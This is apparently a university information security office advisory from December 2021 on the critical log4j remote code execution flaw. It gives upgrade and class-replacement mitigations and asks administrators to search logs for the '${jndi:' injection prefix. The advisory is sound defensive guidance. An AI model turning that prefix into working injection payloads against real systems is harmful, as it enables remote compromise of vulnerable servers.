Updated Dec. 20, 2021
Summary
A critical vulnerability has been found in the widely used Java logging library log4j. This vulnerability can allow remote code execution by an unauthenticated attacker, is easy to exploit, and proof of concept code is publicly available.
Vulnerable Library
Mitigations
-
Upgrade to the latest log4j version, ≥2.17.0
-
If you are using a version older than 2.17.0 and cannot upgrade, the vulnerability can be mitigated by substituting a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's class loading documentation to understand this behavior.
If you are unable to quickly mitigate this vulnerability on a P3 or P4 system, please open a ticket with ISO by emailing security@berkeley.edu
If you administer a publicly accessible P3 or P4 system that is vulnerable, after mitigation, examine your access and application logs for occurrences of "${jndi:" . If any logs are found, please open a ticket with ISO by emailing security@berkeley.edu